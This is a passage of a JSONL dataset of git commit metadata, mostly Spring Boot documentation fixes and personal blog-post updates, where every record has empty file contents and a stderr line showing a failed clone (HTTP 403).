rebalbi\/spring-boot,nebhale\/spring-boot,jmnarloch\/spring-boot,sbuettner\/spring-boot,scottfrederick\/spring-boot,philwebb\/spring-boot-concourse,lexandro\/spring-boot,Buzzardo\/spring-boot,philwebb\/spring-boot-concourse,lenicliu\/spring-boot,mbenson\/spring-boot,Buzzardo\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,htynkn\/spring-boot,shakuzen\/spring-boot,i007422\/jenkins2-course-spring-boot,DeezCashews\/spring-boot,ptahchiev\/spring-boot,i007422\/jenkins2-course-spring-boot,RichardCSantana\/spring-boot,bjornlindstrom\/spring-boot,tsachev\/spring-boot,isopov\/spring-boot,joansmith\/spring-boot,habuma\/spring-boot,jayarampradhan\/spring-boot,wilkinsona\/spring-boot,aahlenst\/spring-boot,NetoDevel\/spring-boot,javyzheng\/spring-boot,sebastiankirsch\/spring-boot,bijukunjummen\/spring-boot,mdeinum\/spring-boot,afroje-reshma\/spring-boot-sample,lucassaldanha\/spring-boot,mbogoevici\/spring-boot,sbuettner\/spring-boot,zhanhb\/spring-boot,xiaoleiPENG\/my-project,Buzzardo\/spring-boot,lucassaldanha\/spring-boot,lenicliu\/spring-boot,izeye\/spring-boot,kdvolder\/spring-boot,scottfrederick\/spring-boot,bbrouwer\/spring-boot,qerub\/spring-boot,neo4j-contrib\/spring-boot,ilayaperumalg\/spring-boot,pvorb\/spring-boot,spring-projects\/spring-boot,bijukunjummen\/spring-boot,mrumpf\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,joshiste\/spring-boot,drumonii\/spring-boot,sbcoba\/spring-boot,tsachev\/spring-boot,qerub\/spring-boot,michael-simons\/spring-boot,NetoDevel\/spring-boot,nebhale\/spring-boot,linead\/spring-boot,dreis2211\/spring-boot,eddumelendez\/spring-boot,RichardCSantana\/spring-boot,ihoneymon\/spring-boot,ihoneymon\/spring-boot,zhanhb\/spring-boot,ollie314\/spring-boot,ilayaperumalg\/spring-boot,sbuettner\/spring-boot,pvorb\/spring-boot,drumonii\/spring-boot,NetoDevel\/spring-boot,i007422\/jenkins2-course-spring-boot,tsachev\/spring-boot,SaravananParthasarathy\/SPSDemo,yangdd1205\/spring-boot,isopov\/spring-boot,vakninr\/spring-boot,mbenson\/spring-boot,felipeg48\/spring-boot,scottfrederick\/spring-boot,aahlenst\/spring-boot,felipeg48\/spring-boot,jmnarloch\/spring-boot,bclozel\/spring-boot,minmay\/spring-boot,herau\/spring-boot,isopov\/spring-boot,nebhale\/spring-boot,xiaoleiPENG\/my-project,qerub\/spring-boot,yangdd1205\/spring-boot,kdvolder\/spring-boot,jvz\/spring-boot,ptahchiev\/spring-boot,rweisleder\/spring-boot,sebastiankirsch\/spring-boot,dfa1\/spring-boot,i007422\/jenkins2-course-spring-boot,drumonii\/spring-boot,spring-projects\/spring-boot,aahlenst\/spring-boot,jayarampradhan\/spring-boot,joshiste\/spring-boot,ollie314\/spring-boot,candrews\/spring-boot,brettwooldridge\/spring-boot,tiarebalbi\/spring-boot,htynkn\/spring-boot,aahlenst\/spring-boot,hello2009chen\/spring-boot,DeezCashews\/spring-boot,Nowheresly\/spring-boot,habuma\/spring-boot,chrylis\/spring-boot,candrews\/spring-boot,shakuzen\/spring-boot,lburgazzoli\/spring-boot,xiaoleiPENG\/my-project,eddumelendez\/spring-boot,herau\/spring-boot,deki\/spring-boot,lexandro\/spring-boot,bjornlindstrom\/spring-boot,bbrouwer\/spring-boot,tsachev\/spring-boot,lucassaldanha\/spring-boot,xiaoleiPENG\/my-project,drumonii\/spring-boot,lucassaldanha\/spring-boot,dreis2211\/spring-boot,jbovet\/spring-boot,wilkinsona\/spring-boot,lexandro\/spring-boot,mdeinum\/spring-boot,jvz\/spring-boot,deki\/spring-boot,javyzheng\/spring-boot,linead\/spring-boot,mosoft521\/spring-boot,philwebb\/spring-boot-concourse,spring-projects\/spring-boot,herau\/spring-boot,SaravananParthasarathy\/SPSDemo,rweisleder\/spring-boot,jayarampra
dhan\/spring-boot,vakninr\/spring-boot,mbenson\/spring-boot,dreis2211\/spring-boot,mosoft521\/spring-boot,javyzheng\/spring-boot,yhj630520\/spring-boot,Buzzardo\/spring-boot,shangyi0102\/spring-boot,linead\/spring-boot,lenicliu\/spring-boot,neo4j-contrib\/spring-boot,lburgazzoli\/spring-boot,aahlenst\/spring-boot,Nowheresly\/spring-boot,vakninr\/spring-boot,RichardCSantana\/spring-boot,mdeinum\/spring-boot,hqrt\/jenkins2-course-spring-boot,hello2009chen\/spring-boot,vpavic\/spring-boot,joshthornhill\/spring-boot,habuma\/spring-boot,joshthornhill\/spring-boot,royclarkson\/spring-boot,dreis2211\/spring-boot,ollie314\/spring-boot,mrumpf\/spring-boot,kamilszymanski\/spring-boot,lucassaldanha\/spring-boot,ptahchiev\/spring-boot,tiarebalbi\/spring-boot,eddumelendez\/spring-boot,tiarebalbi\/spring-boot,ihoneymon\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,rweisleder\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,lexandro\/spring-boot,jbovet\/spring-boot,DeezCashews\/spring-boot,rweisleder\/spring-boot,yangdd1205\/spring-boot,qerub\/spring-boot,javyzheng\/spring-boot,joshthornhill\/spring-boot,ilayaperumalg\/spring-boot,brettwooldridge\/spring-boot,donhuvy\/spring-boot,brettwooldridge\/spring-boot,joansmith\/spring-boot,spring-projects\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,felipeg48\/spring-boot,dfa1\/spring-boot,nebhale\/spring-boot,yhj630520\/spring-boot,zhanhb\/spring-boot,dfa1\/spring-boot,joshiste\/spring-boot,philwebb\/spring-boot,olivergierke\/spring-boot,vpavic\/spring-boot,donhuvy\/spring-boot,zhangshuangquan\/spring-root,thomasdarimont\/spring-boot,lenicliu\/spring-boot","old_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c605675b7a580788c85dcc108782745c63c5fba7","subject":"Fix wrong class reference","message":"Fix wrong class reference\n\nCloses 
gh-4551\n","repos":"wilkinsona\/spring-boot,ptahchiev\/spring-boot,nebhale\/spring-boot,ptahchiev\/spring-boot,mosoft521\/spring-boot,dreis2211\/spring-boot,joansmith\/spring-boot,htynkn\/spring-boot,hqrt\/jenkins2-course-spring-boot,lucassaldanha\/spring-boot,NetoDevel\/spring-boot,philwebb\/spring-boot,SaravananParthasarathy\/SPSDemo,deki\/spring-boot,pvorb\/spring-boot,philwebb\/spring-boot-concourse,mbogoevici\/spring-boot,tiarebalbi\/spring-boot,linead\/spring-boot,mbenson\/spring-boot,drumonii\/spring-boot,Nowheresly\/spring-boot,hqrt\/jenkins2-course-spring-boot,herau\/spring-boot,lexandro\/spring-boot,NetoDevel\/spring-boot,olivergierke\/spring-boot,eddumelendez\/spring-boot,zhanhb\/spring-boot,lexandro\/spring-boot,scottfrederick\/spring-boot,mosoft521\/spring-boot,michael-simons\/spring-boot,philwebb\/spring-boot-concourse,joansmith\/spring-boot,joshiste\/spring-boot,mrumpf\/spring-boot,ameraljovic\/spring-boot,SaravananParthasarathy\/SPSDemo,donhuvy\/spring-boot,mdeinum\/spring-boot,qerub\/spring-boot,spring-projects\/spring-boot,Buzzardo\/spring-boot,lucassaldanha\/spring-boot,jbovet\/spring-boot,ihoneymon\/spring-boot,mdeinum\/spring-boot,donhuvy\/spring-boot,zhanhb\/spring-boot,lburgazzoli\/spring-boot,SaravananParthasarathy\/SPSDemo,afroje-reshma\/spring-boot-sample,drumonii\/spring-boot,isopov\/spring-boot,vpavic\/spring-boot,mbenson\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,michael-simons\/spring-boot,isopov\/spring-boot,hello2009chen\/spring-boot,ihoneymon\/spring-boot,yhj630520\/spring-boot,DeezCashews\/spring-boot,xiaoleiPENG\/my-project,isopov\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,akmaharshi\/jenkins,hqrt\/jenkins2-course-spring-boot,yhj630520\/spring-boot,zhangshuangquan\/spring-root,isopov\/spring-boot,tiarebalbi\/spring-boot,htynkn\/spring-boot,akmaharshi\/jenkins,shakuzen\/spring-boot,dreis2211\/spring-boot,candrews\/spring-boot,habuma\/spring-boot,jmnarloch\/spring-boot,bijukunjummen\/spring-boot,vpavic\/spring-boot,bclozel\/spring-boot,eddumelendez\/spring-boot,felipeg48\/spring-boot,herau\/spring-boot,javyzheng\/spring-boot,chrylis\/spring-boot,habuma\/spring-boot,ilayaperumalg\/spring-boot,sebastiankirsch\/spring-boot,sebastiankirsch\/spring-boot,dfa1\/spring-boot,thomasdarimont\/spring-boot,ollie314\/spring-boot,scottfrederick\/spring-boot,zhangshuangquan\/spring-root,dreis2211\/spring-boot,shakuzen\/spring-boot,mrumpf\/spring-boot,i007422\/jenkins2-course-spring-boot,philwebb\/spring-boot,brettwooldridge\/spring-boot,thomasdarimont\/spring-boot,lexandro\/spring-boot,qerub\/spring-boot,drumonii\/spring-boot,lburgazzoli\/spring-boot,kamilszymanski\/spring-boot,RichardCSantana\/spring-boot,spring-projects\/spring-boot,rweisleder\/spring-boot,olivergierke\/spring-boot,sbuettner\/spring-boot,pvorb\/spring-boot,yangdd1205\/spring-boot,olivergierke\/spring-boot,ameraljovic\/spring-boot,lenicliu\/spring-boot,mbenson\/spring-boot,mbenson\/spring-boot,qerub\/spring-boot,neo4j-contrib\/spring-boot,kamilszymanski\/spring-boot,dreis2211\/spring-boot,bclozel\/spring-boot,drumonii\/spring-boot,jvz\/spring-boot,scottfrederick\/spring-boot,cleverjava\/jenkins2-course-spring-boot,mrumpf\/spring-boot,chrylis\/spring-boot,ollie314\/spring-boot,neo4j-contrib\/spring-boot,ollie314\/spring-boot,scottfrederick\/spring-boot,isopov\/spring-boot,sbcoba\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,philwebb\/spring-boot-concourse,izeye\/spring-boot,linead\/spring-boot,minmay\/spring-boot,javyzheng\/spring-boot,joshthornhill\/spring-boot,joshiste\/spring
-boot,neo4j-contrib\/spring-boot,mbenson\/spring-boot,sbuettner\/spring-boot,jvz\/spring-boot,brettwooldridge\/spring-boot,tsachev\/spring-boot,wilkinsona\/spring-boot,ptahchiev\/spring-boot,yhj630520\/spring-boot,royclarkson\/spring-boot,chrylis\/spring-boot,ihoneymon\/spring-boot,jbovet\/spring-boot,SaravananParthasarathy\/SPSDemo,rajendra-chola\/jenkins2-course-spring-boot,aahlenst\/spring-boot,lucassaldanha\/spring-boot,ilayaperumalg\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,javyzheng\/spring-boot,izeye\/spring-boot,mosoft521\/spring-boot,zhanhb\/spring-boot,ilayaperumalg\/spring-boot,donhuvy\/spring-boot,DeezCashews\/spring-boot,kamilszymanski\/spring-boot,dfa1\/spring-boot,linead\/spring-boot,yangdd1205\/spring-boot,spring-projects\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,aahlenst\/spring-boot,brettwooldridge\/spring-boot,htynkn\/spring-boot,scottfrederick\/spring-boot,nebhale\/spring-boot,philwebb\/spring-boot,mbogoevici\/spring-boot,Nowheresly\/spring-boot,tiarebalbi\/spring-boot,kdvolder\/spring-boot,kamilszymanski\/spring-boot,thomasdarimont\/spring-boot,lenicliu\/spring-boot,chrylis\/spring-boot,aahlenst\/spring-boot,felipeg48\/spring-boot,akmaharshi\/jenkins,joshiste\/spring-boot,kdvolder\/spring-boot,shangyi0102\/spring-boot,jvz\/spring-boot,dfa1\/spring-boot,yangdd1205\/spring-boot,ihoneymon\/spring-boot,i007422\/jenkins2-course-spring-boot,ptahchiev\/spring-boot,donhuvy\/spring-boot,minmay\/spring-boot,aahlenst\/spring-boot,sbuettner\/spring-boot,hqrt\/jenkins2-course-spring-boot,jxblum\/spring-boot,cleverjava\/jenkins2-course-spring-boot,ilayaperumalg\/spring-boot,rweisleder\/spring-boot,rweisleder\/spring-boot,bclozel\/spring-boot,minmay\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,lburgazzoli\/spring-boot,philwebb\/spring-boot,zhanhb\/spring-boot,eddumelendez\/spring-boot,vpavic\/spring-boot,xiaoleiPENG\/my-project,Buzzardo\/spring-boot,lexandro\/spring-boot,ameraljovic\/spring-boot,jbovet\/spring-boot,Buzzardo\/spring-boot,bjornlindstrom\/spring-boot,eddumelendez\/spring-boot,thomasdarimont\/spring-boot,herau\/spring-boot,tsachev\/spring-boot,lburgazzoli\/spring-boot,bjornlindstrom\/spring-boot,bbrouwer\/spring-boot,habuma\/spring-boot,felipeg48\/spring-boot,sebastiankirsch\/spring-boot,ameraljovic\/spring-boot,NetoDevel\/spring-boot,bijukunjummen\/spring-boot,zhangshuangquan\/spring-root,qerub\/spring-boot,ptahchiev\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,shangyi0102\/spring-boot,mrumpf\/spring-boot,royclarkson\/spring-boot,tsachev\/spring-boot,Buzzardo\/spring-boot,habuma\/spring-boot,scottfrederick\/spring-boot,DeezCashews\/spring-boot,joshthornhill\/spring-boot,RichardCSantana\/spring-boot,bbrouwer\/spring-boot,cleverjava\/jenkins2-course-spring-boot,deki\/spring-boot,Nowheresly\/spring-boot,tiarebalbi\/spring-boot,bijukunjummen\/spring-boot,vpavic\/spring-boot,joshthornhill\/spring-boot,joshiste\/spring-boot,joshthornhill\/spring-boot,kdvolder\/spring-boot,candrews\/spring-boot,zhanhb\/spring-boot,i007422\/jenkins2-course-spring-boot,shangyi0102\/spring-boot,jxblum\/spring-boot,cleverjava\/jenkins2-course-spring-boot,lucassaldanha\/spring-boot,sbcoba\/spring-boot,akmaharshi\/jenkins,yhj630520\/spring-boot,drumonii\/spring-boot,kdvolder\/spring-boot,pvorb\/spring-boot,lexandro\/spring-boot,DeezCashews\/spring-boot,shakuzen\/spring-boot,jmnarloch\/spring-boot,akmaharshi\/jenkins,sebastiankirsch\/spring-boot,dfa1\/spring-boot,hello2009chen\/spring-boot,jayarampradhan\/spring-boot,michael-simons\/spring-boot,sbuettner\/sp
ring-boot,afroje-reshma\/spring-boot-sample,joansmith\/spring-boot,RichardCSantana\/spring-boot,hqrt\/jenkins2-course-spring-boot,philwebb\/spring-boot-concourse,habuma\/spring-boot,izeye\/spring-boot,shangyi0102\/spring-boot,bclozel\/spring-boot,jbovet\/spring-boot,royclarkson\/spring-boot,jayarampradhan\/spring-boot,tiarebalbi\/spring-boot,javyzheng\/spring-boot,shakuzen\/spring-boot,deki\/spring-boot,ollie314\/spring-boot,hello2009chen\/spring-boot,shangyi0102\/spring-boot,Buzzardo\/spring-boot,pvorb\/spring-boot,philwebb\/spring-boot,jxblum\/spring-boot,tsachev\/spring-boot,minmay\/spring-boot,felipeg48\/spring-boot,SaravananParthasarathy\/SPSDemo,wilkinsona\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,tiarebalbi\/spring-boot,afroje-reshma\/spring-boot-sample,hello2009chen\/spring-boot,sbcoba\/spring-boot,mdeinum\/spring-boot,donhuvy\/spring-boot,ihoneymon\/spring-boot,jayarampradhan\/spring-boot,felipeg48\/spring-boot,vpavic\/spring-boot,jayarampradhan\/spring-boot,htynkn\/spring-boot,RichardCSantana\/spring-boot,michael-simons\/spring-boot,deki\/spring-boot,yhj630520\/spring-boot,sbcoba\/spring-boot,spring-projects\/spring-boot,bjornlindstrom\/spring-boot,sebastiankirsch\/spring-boot,felipeg48\/spring-boot,jmnarloch\/spring-boot,bbrouwer\/spring-boot,jayarampradhan\/spring-boot,wilkinsona\/spring-boot,NetoDevel\/spring-boot,xiaoleiPENG\/my-project,jbovet\/spring-boot,mbenson\/spring-boot,mrumpf\/spring-boot,philwebb\/spring-boot,lenicliu\/spring-boot,htynkn\/spring-boot,thomasdarimont\/spring-boot,mbogoevici\/spring-boot,rweisleder\/spring-boot,ihoneymon\/spring-boot,sbuettner\/spring-boot,jxblum\/spring-boot,habuma\/spring-boot,jmnarloch\/spring-boot,michael-simons\/spring-boot,chrylis\/spring-boot,hello2009chen\/spring-boot,neo4j-contrib\/spring-boot,nebhale\/spring-boot,afroje-reshma\/spring-boot-sample,bijukunjummen\/spring-boot,chrylis\/spring-boot,neo4j-contrib\/spring-boot,eddumelendez\/spring-boot,Buzzardo\/spring-boot,herau\/spring-boot,Nowheresly\/spring-boot,ptahchiev\/spring-boot,lucassaldanha\/spring-boot,vakninr\/spring-boot,vpavic\/spring-boot,joshiste\/spring-boot,xiaoleiPENG\/my-project,jxblum\/spring-boot,tsachev\/spring-boot,javyzheng\/spring-boot,vakninr\/spring-boot,ameraljovic\/spring-boot,wilkinsona\/spring-boot,aahlenst\/spring-boot,olivergierke\/spring-boot,cleverjava\/jenkins2-course-spring-boot,nebhale\/spring-boot,mosoft521\/spring-boot,deki\/spring-boot,jvz\/spring-boot,bijukunjummen\/spring-boot,joansmith\/spring-boot,isopov\/spring-boot,royclarkson\/spring-boot,izeye\/spring-boot,i007422\/jenkins2-course-spring-boot,sbcoba\/spring-boot,candrews\/spring-boot,mdeinum\/spring-boot,candrews\/spring-boot,bclozel\/spring-boot,michael-simons\/spring-boot,mdeinum\/spring-boot,vakninr\/spring-boot,bjornlindstrom\/spring-boot,mbogoevici\/spring-boot,izeye\/spring-boot,herau\/spring-boot,royclarkson\/spring-boot,joansmith\/spring-boot,brettwooldridge\/spring-boot,zhanhb\/spring-boot,pvorb\/spring-boot,joshthornhill\/spring-boot,lburgazzoli\/spring-boot,shakuzen\/spring-boot,joshiste\/spring-boot,dfa1\/spring-boot,vakninr\/spring-boot,jxblum\/spring-boot,donhuvy\/spring-boot,eddumelendez\/spring-boot,candrews\/spring-boot,vakninr\/spring-boot,aahlenst\/spring-boot,linead\/spring-boot,kdvolder\/spring-boot,brettwooldridge\/spring-boot,bjornlindstrom\/spring-boot,dreis2211\/spring-boot,lenicliu\/spring-boot,kamilszymanski\/spring-boot,minmay\/spring-boot,nebhale\/spring-boot,i007422\/jenkins2-course-spring-boot,lenicliu\/spring-boot,rweisleder\/spring-boot,tsac
hev\/spring-boot,ilayaperumalg\/spring-boot,linead\/spring-boot,jvz\/spring-boot,kdvolder\/spring-boot,ollie314\/spring-boot,bbrouwer\/spring-boot,ilayaperumalg\/spring-boot,zhangshuangquan\/spring-root,jmnarloch\/spring-boot,RichardCSantana\/spring-boot,olivergierke\/spring-boot,mbogoevici\/spring-boot,qerub\/spring-boot,bbrouwer\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,htynkn\/spring-boot,bclozel\/spring-boot,xiaoleiPENG\/my-project,dreis2211\/spring-boot,drumonii\/spring-boot,spring-projects\/spring-boot,NetoDevel\/spring-boot,Nowheresly\/spring-boot,mosoft521\/spring-boot,DeezCashews\/spring-boot,wilkinsona\/spring-boot,spring-projects\/spring-boot,shakuzen\/spring-boot,philwebb\/spring-boot-concourse,rweisleder\/spring-boot,mdeinum\/spring-boot,afroje-reshma\/spring-boot-sample,zhangshuangquan\/spring-root","old_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_file":"spring-boot-docs\/src\/main\/asciidoc\/spring-boot-features.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mbogoevici\/spring-boot.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c93464edf8a9f98c737f97a4001e4b7eb2f89120","subject":"Update 2018-09-04-Some-Java-oddities.adoc","message":"Update 2018-09-04-Some-Java-oddities.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-09-04-Some-Java-oddities.adoc","new_file":"_posts\/2018-09-04-Some-Java-oddities.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16f45395e88d0d416b0084768ebfac8b72456b5c","subject":"Update 2019-03-10-And-thats-an-Email.adoc","message":"Update 2019-03-10-And-thats-an-Email.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2019-03-10-And-thats-an-Email.adoc","new_file":"_posts\/2019-03-10-And-thats-an-Email.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cce22391fd1004bcde65e1ecdba36c8400af97a7","subject":"Publish 2098-1-1-Puzzle-3-Hack-Me-Baby.adoc","message":"Publish 2098-1-1-Puzzle-3-Hack-Me-Baby.adoc","repos":"puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io,puzzles-engineer\/puzzles-engineer.github.io","old_file":"2098-1-1-Puzzle-3-Hack-Me-Baby.adoc","new_file":"2098-1-1-Puzzle-3-Hack-Me-Baby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/puzzles-engineer\/puzzles-engineer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd24a3a8d10e061e8703ca43c4a87b1570382e48","subject":"Update 2015-06-06-Lorem-ipsum-3.adoc","message":"Update 
2015-06-06-Lorem-ipsum-3.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-06-06-Lorem-ipsum-3.adoc","new_file":"_posts\/2015-06-06-Lorem-ipsum-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2fa0d1b5538ebf924db69ea67eaf14b9b62f8db7","subject":"Update 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","message":"Update 17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","repos":"marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io,marchelo2212\/marchelo2212.github.io","old_file":"_posts\/17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","new_file":"_posts\/17-07-2016-Estilos-de-aprendizaje-e-Innovacion-educativa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/marchelo2212\/marchelo2212.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71a376e930a9b7461a38e717e4525fce940f5fd0","subject":"Update 2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","message":"Update 2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","new_file":"_posts\/2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"55f9ed7c6f205f060acb85f1839ea3af061da17d","subject":"Update 2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","message":"Update 2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","new_file":"_posts\/2017-03-10-mark-read-all-by-L-E-G-O-We-Do20-de-education.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a46a2a9aa27250c2c1765f4b438262ca5eb95787","subject":"Publish 20150327-Happy-Easter.adoc","message":"Publish 20150327-Happy-Easter.adoc","repos":"mcrotty\/hubpress.io,mcrotty\/hubpress.io,mcrotty\/hubpress.io,mcrotty\/hubpress.io","old_file":"20150327-Happy-Easter.adoc","new_file":"20150327-Happy-Easter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcrotty\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"798213d26b3c356b56cc912ecad6a62e1b694f23","subject":"correct syntax error","message":"correct syntax error\n\nSigned-off-by: Dan Mack 
<f52cae7d677fd8a83ac7cc4406c1d073a69a7b23@macktronics.com>\n","repos":"danmack\/resume","old_file":"activities.adoc","new_file":"activities.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danmack\/resume.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e2e6521f335163c55189dee6aeca39893dcc092c","subject":"Update 2016-04-23-Its-Saturday.adoc","message":"Update 2016-04-23-Its-Saturday.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-04-23-Its-Saturday.adoc","new_file":"_posts\/2016-04-23-Its-Saturday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95270904a9b9740f54c4ad5689ac2cf6292097a3","subject":"Update 2016-06-02-Word-Press-2.adoc","message":"Update 2016-06-02-Word-Press-2.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_file":"_posts\/2016-06-02-Word-Press-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40a225aedf456d45ec9b25e0130159996ff0be04","subject":"Update 2015-08-21-Launch-of-the-new-blog.adoc","message":"Update 2015-08-21-Launch-of-the-new-blog.adoc","repos":"Motsai\/old-repo-to-mirror,Motsai\/old-repo-to-mirror,Motsai\/old-repo-to-mirror","old_file":"_posts\/2015-08-21-Launch-of-the-new-blog.adoc","new_file":"_posts\/2015-08-21-Launch-of-the-new-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Motsai\/old-repo-to-mirror.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51f174d60727d515acf9396c4cc462c7b3fc14b8","subject":"Update 2016-11-15-091000-Tuesday-Morning.adoc","message":"Update 2016-11-15-091000-Tuesday-Morning.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-15-091000-Tuesday-Morning.adoc","new_file":"_posts\/2016-11-15-091000-Tuesday-Morning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc20508ae5818e40e6e24e5f0e843ed2dbd3c011","subject":"Update 2017-10-12-start-chrome-extension.adoc","message":"Update 2017-10-12-start-chrome-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-12-start-chrome-extension.adoc","new_file":"_posts\/2017-10-12-start-chrome-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"cdf33a9ff398e43b2ef4c2f24fcefb5f2ec459b0","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bef14e19ba0df2044456900ac50229d95eb23458","subject":"Imported release notes for Groovy 1.6","message":"Imported release notes for Groovy 